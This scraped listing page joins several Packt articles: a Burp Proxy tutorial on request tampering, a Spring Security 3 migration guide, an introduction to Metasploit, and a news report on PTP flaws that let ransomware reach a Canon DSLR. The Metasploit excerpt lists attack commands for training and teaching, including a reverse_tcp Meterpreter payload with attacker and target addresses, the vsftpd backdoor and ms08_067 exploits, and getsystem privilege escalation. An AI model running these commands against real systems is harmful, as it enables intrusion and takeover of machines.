look like the following: GET /books/all?keys=PHP HTTP/1.1Host: www.packtpub.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0)Gecko/20100101 Firefox/15.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip, deflateProxy-Connection: keep-alive Click on forward and get back to the browser. This should result in a search query performed with the string PHP. You can verify it by simply checking the results in the HTML page. Although we have used the raw view to change the previous HTTP request, it is actually possible to use any of the Burp Proxy view. For example, in the params view, it is possible to add a new parameter by following these steps: Clicking on new (right side), from the Burp Proxy params view. Selecting the proper parameter type (URL, body, or cookie). URL should be used for GET parameters, whereas body denotes POST parameters. Typing the name and the value of the newly created parameter. Advanced features After practicing with the basic features provided by Burp Proxy, you are almost ready to experiment with more advanced configurations. Match and replace Let's imagine that you are testing an application designed for mobile devices using a standard browser from your computer. In most cases, the web server examines the user-agent provided by the browser to identify the specific platform and respond with customized resources that better fit mobile phones and tablets. Under these circumstances, you will particularly find the match and replace function, provided by Burp Proxy, very useful. Let's configure Burp Proxy in order to tamper the user-agent HTTP header field: In the options tab of Burp Proxy, scroll down to the match and replace section. Under the match and replace table, a drop-down list and two text fields allow to create a customized rule. Select request header from the drop-down list since we want to create a match condition pertaining to HTTP requests. Type ^User-Agent.*$ in the first text field. This field represents the match within the HTTP request. Burp Proxy's match and replace feature allows you to use simple strings as well as complex regular expressions. If you are not familiar with regular expressions, have a look at http://www.regular-expressions.info/quickstart. html. In the second text field, type Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/4h20+ (KHTML, like Gecko) Version/3.0 Mobile/1C25 Safari/419.3 or any other fake user-agent that you want to impersonate. Click add and verify that the new match has been added to the list; this button is shown here: Burp Proxy match and replace list Intercept a request, leave it to pass through the proxy, and verify that it has been automatically modified by the tool. Automatically modified HTTP header in Burp Proxy HTML modification Another interesting feature of Burp Proxy is the automatic HTML modification, that can be activated and configured in the appropriate section within Burp Proxy | options. By using this function, you can automatically remove JavaScript or modify HTML forms of all received HTTP responses. Some applications deploy client-side validation in the form of disabled HTML form fields or JavaScript code. If you want to verify the presence of server-side controls that enforce specific data formats, you would need to tamper the request with invalid data. In these situations, you can either manually tamper the request in the proxy or enable HTML modification to remove any client-side validation and use the browser in order to submit invalid data. This function can be also used to display hidden form fields. Let's see in practice how you can activate this feature: In Burp Proxy, go to options, scroll down to the HTML modification section. Numerous options are available in this section: unhide hidden form fields to display hidden HTML form fields, enable disabled form fields to submit all input forms present inside the HTML page, remove input field length limits to allow extra-long strings in the text fields, remove JavaScript form validation to make Burp Proxy all onsubmit handler JavaScript functions from HTML forms, remove all JavaScript to completely remove all JS scripts and remove object tags to remove embedded objects within the HTML document. Select the desired checkboxes to activate automatic HTML modification. Summary Using this feature, you will be able to understand whether the web application enforces server- side validation. For instance, some insecure applications use client-side validation only (for example, via JavaScript functions). You can activate the automatic HTML modification feature by selecting the remove JavaScript form validation checkbox in order to perform input validation testing directly from your browser. Resources for Article : Further resources on this subject: Visual Studio 2010 Test Types [Article] Ordered and Generic Tests in Visual Studio 2010 [Article] Manual, Generic, and Ordered Tests using Visual Studio 2008 [Article]  
Read more
  • 0
  • 0
  • 4151

article-image-migration-spring-security-3
Packt
21 May 2010
5 min read
Save for later

Migration to Spring Security 3

Packt
21 May 2010
5 min read
(For more resources on Spring, see here.) During the course of this article we will: Review important enhancements in Spring Security 3 Understand configuration changes required in your existing Spring Security 2 applications when moving them to Spring Security 3 Illustrate the overall movement of important classes and packages in Spring Security 3 Once you have completed the review of this article, you will be in a good position to migrate an existing application from Spring Security 2 to Spring Security 3. Migrating from Spring Security 2 You may be planning to migrate an existing application to Spring Security 3, or trying to add functionality to a Spring Security 2 application and looking for guidance. We'll try to address both of your concerns in this article. First, we'll run through the important differences between Spring Security 2 and 3—both in terms of features and configuration. Second, we'll provide some guidance in mapping configuration or class name changes. These will better enable you to translate the examples from Spring Security 3 back to Spring Security 2 (where applicable). A very important migration note is that Spring Security 3 mandates a migration to Spring Framework 3 and Java 5 (1.5) or greater. Be aware that in many cases, migrating these other components may have a greater impact on your application than the upgrade of Spring Security! Enhancements in Spring Security 3 Significant enhancements in Spring Security 3 over Spring Security 2 include the following: The addition of Spring Expression Language (SpEL) support for access declarations, both in URL patterns and method access specifications. Additional fine-grained configuration around authentication and accessing successes and failures. Enhanced capabilities of method access declaration, including annotationbased pre-and post-invocation access checks and filtering, as well as highly configurable security namespace XML declarations for custom backing bean behavior. Fine-grained management of session access and concurrency control using the security namespace. Noteworthy revisions to the ACL module, with the removal of the legacy ACL code in o.s.s.acl and some important issues with the ACL framework are addressed. Support for OpenID Attribute Exchange, and other general improvements to the robustness of OpenID. New Kerberos and SAML single sign-on support through the Spring Security Extensions project. Other more innocuous changes encompassed a general restructuring and cleaning up of the codebase and the configuration of the framework, such that the overall structure and usage makes much more sense. The authors of Spring Security have made efforts to add extensibility where none previously existed, especially in the areas of login and URL redirection. If you are already working in a Spring Security 2 environment, you may not find compelling reasons to upgrade if you aren't pushing the boundaries of the framework. However, if you have found limitations in the available extension points, code structure, or configurability of Spring Security 2, you'll welcome many of the minor changes that we discuss in detail in the remainder of this article. Changes to configuration in Spring Security 3 Many of the changes in Spring Security 3 will be visible in the security namespace style of configuration. Although this article cannot cover all of the minor changes in detail, we'll try to cover those changes that will be most likely to affect you as you move to Spring Security 3. Rearranged AuthenticationManager configuration The most obvious changes in Spring Security 3 deal with the configuration of the AuthenticationManager and any related AuthenticationProvider elements. In Spring Security 2, the AuthenticationManager and AuthenticationProvider configuration elements were completely disconnected—declaring an AuthenticationProvider didn't require any notion of an AuthenticationManager at all. <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /></authentication-provider> In Spring Security 2 to declare the <authentication-manager> element as a sibling of any AuthenticationProvider. <authentication-manager alias="authManager"/><authentication-provider> <jdbc-user-service data-source-ref="dataSource"/></authentication-provider><ldap-authentication-provider server-ref="ldap://localhost:10389/"/> In Spring Security 3, all AuthenticationProvider elements must be the children of <authentication-manager> element, so this would be rewritten as follows: <authentication-manager alias="authManager"> <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /> </authentication-provider> <ldap-authentication-provider server-ref= "ldap://localhost:10389/"/></authentication-manager> Of course, this means that the <authentication-manager> element is now required in any security namespace configurations. If you had defined a custom AuthenticationProvider in Spring Security 2, you would have decorated it with the <custom-authentication-provider> element as part of its bean definition. <bean id="signedRequestAuthenticationProvider" class="com.packtpub.springsecurity.security .SignedUsernamePasswordAuthenticationProvider"> <security:custom-authentication-provider/> <property name="userDetailsService" ref="userDetailsService"/><!-- ... --></bean> While moving this custom AuthenticationProvider to Spring Security 3, we would remove the decorator element and instead configure the AuthenticationProvider using the ref attribute of the <authentication-provider> element as follows: <authentication-manager alias="authenticationManager"> <authentication-provider ref= "signedRequestAuthenticationProvider"/></authentication-manager> Of course, the source code of our custom provider would change due to class relocations and renaming in Spring Security 3—look later in the article for basic guidelines, and in the code download for this article to see a detailed mapping. New configuration syntax for session management options In addition to continuing support for the session fixation and concurrency control features from prior versions of the framework, Spring Security 3 adds new configuration capabilities for customizing URLs and classes involved in session and concurrency control management. If your older application was configuring session fixation protection or concurrent session control, the configuration settings have a new home in the <session-management> directive of the <http> element. In Spring Security 2, these options would be configured as follows: <http ... session-fixation-protection="none"><!-- ... --> <concurrent-session-control exception-if-maximum-exceeded ="true" max-sessions="1"/></http> The analogous configuration in Spring Security 3 removes the session-fixation-protection attribute from the <http> element, and consolidates as follows: <http ...> <session-management session-fixation-protection="none"> <concurrency-control error-if-maximum-exceeded ="true" max-sessions="1"/> </session-management></http> You can see that the new logical organization of these options is much more sensible and leaves room for future expansion.
Read more
  • 0
  • 0
  • 4131
article-image-getting-started-metasploit
Packt
22 Jun 2017
10 min read
Save for later

Getting Started with Metasploit

Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics: Fundamentals of Metasploit Benefits of using Metasploit (For more resources related to this topic, see here.) Penetration testing is an art of performing a deliberate attack on a network, web application, server or any device that require a thorough check up from the security perspective. The idea of a penetration test is to uncover flaws while simulating real world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in the systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered as one of the most practical tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more. The fundamentals of Metasploit Now that we have completed the setup of Kali Linux let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features. Metasploit comes in various editions, as follows: Metasploit pro: This edition is a commercial edition, offers tons of great features such as web application scanning and exploitation, automated exploitation and is quite suitable for professional penetration testers and IT security teams. Pro edition is used for advanced penetration tests and enterprise security programs. Metasploit express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute forcing of the credentials, and much more. This version is quite suitable for IT security teams to small to medium size companies. Metasploit community: This is a free version with reduced functionalities of the express edition. However, for students and small businesses, this edition is a favorable choice. Metasploit framework: This is a command-line version with all manual tasks such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers. You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/ We will be using the Metasploit community and framework version.Metasploit also offers various types of user interfaces, as follows: The graphical user interface(GUI): This has all the options available at a click of a button. This interface offers a user-friendly interface that helps to provide a cleaner vulnerability management. The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all in one approach to all the options offered by Metasploit. This interface is also considered one of the most stable interfaces. The command-line interface: This is the more potent interface that supports the launching of exploits to activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job. Armitage: Armitage by Raphael Mudge added a neat hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortanascripting language. Basics of Metasploit framework Before we put our hands onto the Metasploit framework, let us understand basic terminologies used in Metasploit. However, the following modules are not just terminologies but modules that are heart and soul of the Metasploit project: Exploit: This is a piece of code, which when executed, will trigger the vulnerability at the target. Payload: This is a piece of code that runs at the target after a successful exploitation is done. It defines the type of access and actions we need to gain on the target system. Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more. Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall. Meterpreter: This is a payload that uses in-memory stagers based on DLL injections. It provides a variety of functions to perform at the target, which makes it a popular choice. Architecture of Metasploit Metasploit comprises of various components such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows: Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of various libraries as explained in the following table: Library name Uses REX Handles almost all core functions such as setting up sockets, connections, formatting, and all other raw functions MSF CORE Provides the underlying API and the actual core that describes the framework MSF BASE Provides friendly API support to modules We have many types of modules in Metasploit, and they differ regarding their functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as shown in the following table: Module type Working Payloads Payloads are used to carry out operations such as connecting to or from the target system after exploitation or performing a particular task such as installing a service and so on. Payload execution is the next step after the system is exploited successfully. Auxiliary Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service and enumeration, and so on. Encoders Encoders are used to encode payloads and the attack vectors to (or intending to) evade detection by antivirus solutions or firewalls. NOPs NOP generators are used for alignment which results in making exploits stable. Exploits The actual code that triggers a vulnerability Metasploit framework console and commands Gathering knowledge of the architecture of Metasploit, let us now run Metasploit to get a hands-on knowledge about the commands and different modules. To start Metasploit, we first need to establish database connection so that everything we do can be logged into the database. However, usage of databases also speeds up Metasploit's load time by making use of cache and indexes for all modules. Therefore, let us start the postgresql service by typing in the following command at the terminal: root@beast:~# service postgresql start Now, to initialize Metasploit's database let us initialize msfdb as shown in the following screenshot: It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start the Metasploit's database using the following command: root@beast:~# msfdb start We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to startMetasploit as shown in the following screenshot: Welcome to the Metasploit console, let us run the help command to see what other commands are available to us: The commands in the preceding screenshot are core Metasploit commands which are used to set/get variables, load plugins, route traffic, unset variables, printing version, finding the history of commands issued, and much more. These commands are pretty general. Let's see module based commands as follows: Everything related to a particular module in Metasploit comes under module controls section of the Help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core, and advanced options related to a module and even can edit a module inline. Let us learn some basic commands in Metasploit and familiarize ourselves to the syntax and semantics of these commands: Command Usage Example use [auxiliary/exploit/payload/encoder] To select a particular msf>use exploit/unix/ftp/vsftpd_234_backdoor msf>use auxiliary/scanner/portscan/tcp show[exploits/payloads/encoder/auxiliary/options] To see the list of available modules of a particular type msf>show payloads msf> show options set [options/payload] To set a value to a particular object msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112 msf> set LPORT 4444 msf> set RPORT 8080 setg [options/payload] To assign a value to a particular object globally, so the values do not change when a module is switched on msf>setgRHOST 192.168.10.112 run To launch an auxiliary module after all the required options are set msf>run exploit To launch an exploit msf>exploit back To unselect a module and move back msf(ms08_067_netapi)>back msf> Info To list the information related to a particular exploit/module/auxiliary msf>info exploit/windows/smb/ms08_067_netapi msf(ms08_067_netapi)>info Search To find a particular module msf>search hfs check To check whether a particular target is vulnerable to the exploit or not msf>check Sessions To list the available sessions msf>sessions [session number]   Meterpreter commands Usage Example sysinfo To list system information of the compromised host meterpreter>sysinfo ifconfig To list the network interfaces on the compromised host meterpreter>ifconfig meterpreter>ipconfig (Windows) Arp List of IP and MAC addresses of hosts connected to the target meterpreter>arp background To send an active session to background meterpreter>background shell To drop a cmd shell on the target meterpreter>shell getuid To get the current user details meterpreter>getuid getsystem To escalate privileges and gain system access meterpreter>getsystem getpid To gain the process id of the meterpreter access meterpreter>getpid ps To list all the processes running at the target meterpreter>ps If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commandsfor more information on basic commands Benefits of using Metasploit Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors which are listed as follows: Metasploit framework is open source Metasploit supports large testing networks by making use of CIDR identifiers Metasploit offers quick generation of payloads which can be changed or switched on the fly Metasploit leaves the target system stable in most of the cases The GUI environment provides a fast and user-friendly way to conduct penetration testing Summary Throughout this article, we learned the basics of Metasploit. We learned about various syntax and semantics of Metasploit commands. We also learned the benefits of using Metasploit. Resources for Article: Further resources on this subject: Approaching a Penetration Test Using Metasploit [article] Metasploit Custom Modules and Meterpreter Scripting [article] So, what is Metasploit? [article]
Read more
  • 0
  • 0
  • 4061

article-image-vulnerabilities-in-the-picture-transfer-protocol-ptp-allows-researchers-to-inject-ransomware-in-canons-dslr-camera
Savia Lobo
13 Aug 2019
5 min read
Save for later

Vulnerabilities in the Picture Transfer Protocol (PTP) allows researchers to inject ransomware in Canon’s DSLR camera

Savia Lobo
13 Aug 2019
5 min read
At the DefCon 27, Eyal Itkin, a vulnerability researcher at Check Point Software Technologies, demonstrated how vulnerabilities in the Picture Transfer Protocol (PTP) allowed him to infect a Canon EOS 80D DSLR with ransomware over a rogue WiFi connection. The PTP along with image transfer also contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware. The researcher chose Canon’s EOS 80D DSLR camera for three major reasons: Canon is the largest DSLR maker, controlling more than 50% of the market. The EOS 80D supports both USB and WiFi. Canon has an extensive “modding” community, called Magic Lantern, an open-source free software add-on that adds new features to the Canon EOS cameras. Eyal Itkin highlighted six vulnerabilities in the PTP that can easily allow a hacker to infiltrate the DSLRs and inject ransomware and lock the device. Next, the users might have to pay ransom to free up their camera and picture files. CVE-2019-5994 – Buffer Overflow in SendObjectInfo  (opcode 0x100C) CVE-2019-5998 – Buffer Overflow in NotifyBtStatus (opcode 0x91F9) CVE-2019-5999– Buffer Overflow in BLERequest (opcode 0x914C) CVE-2019-6000– Buffer Overflow in SendHostInfo (opcode0x91E4) CVE-2019-6001– Buffer Overflow in SetAdapterBatteryReport (opcode 0x91FD) CVE-2019-5995 – Silent malicious firmware update Itkin’s team informed Canon about the vulnerabilities in their DSLR on March 31, 2019. Recently, on August 6, Canon published a security advisory informing users that, “at this point, there have been no confirmed cases of these vulnerabilities being exploited to cause harm” and asking them to take advised measures to ensure safety. Itkin told The Verge, “due to the complexity of the protocol, we do believe that other vendors might be vulnerable as well, however, it depends on their respective implementation”. Though Itkin said he worked only with the Canon model, he also said DSLRs of other companies may also be at high risk. Vulnerability discovery by Itkin’s team in Canon’s DSLR After Itkin’s team was successful in dumping the camera’s firmware and loading it into their disassembler (IDA Pro), they say finding the PTP layer was an easy task. This is because, The PTP layer is command-based, and every command has a unique numeric opcode. The firmware contains many indicative strings, which eases the task of reverse-engineering it. Next, the team traversed back from the PTP OpenSession handler and found the main function that registers all of the PTP handlers according to their opcodes. “When looking on the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them is very high,” Itkin wrote in the research report. Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML, Itkin said. The team realized that most of the commands were relatively simple. “They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer,” Itkin writes. “From an attacker’s viewpoint, we have full control of this input buffer, and therefore, we can start looking for vulnerabilities in this much smaller set of commands. Luckily for us, the parsing code for each command uses plain C code and is quite straight-forward to analyze,” he further added. Following this, they were able to find their first vulnerabilities and then the rest. Check Point and Canon have advised users to ensure that their cameras are using the latest firmware and install patches whenever they become available. Also, if the device is not in use camera owners should keep the device’s Wi-Fi turned off. A user on HackerNews points out, “It could get even worse if the perpetrator instead of bricking the device decides to install a backdoor that silently uploads photos to a server whenever a wifi connection is established.” Another user on Petapixel explained what quick measures they should take,  “A custom firmware can close the vulnerability also if they put in the work. Just turn off wifi and don't use random computers in grungy cafes to connect to your USB port and you should be fine. It may or may not happen but it leaves the door open for awesome custom firmware to show up. Easy ones are real CLOG for 1dx2. For the 5D4, I would imagine 24fps HDR, higher res 120fps, and free Canon Log for starters. For non tech savvy people that just leave wifi on all the time, that visit high traffic touristy photo landmarks they should update. Especially if they have no interest in custom firmware.” Another user on Petapixel highlighted the fact, “this hack relies on a serious number of things to be in play before it works, there is no mention of how to get the camera working again, is it just a case of flashing the firmware and accepting you may have lost a few images ?... there’s a lot more things to worry about than this.” Check Point has demonstrated the entire attack in the following YouTube video. https://youtu.be/75fVog7MKgg To know more about this news in detail, read Eyal Itkin’s complete research on Check Point. Researchers reveal vulnerability that can bypass payment limits in contactless Visa card Apple patched vulnerability in Mac’s Zoom Client; plans to address ‘video on by default’ VLC media player affected by a major vulnerability in a 3rd library, libebml
Read more
  • 0
  • 0
  • 4012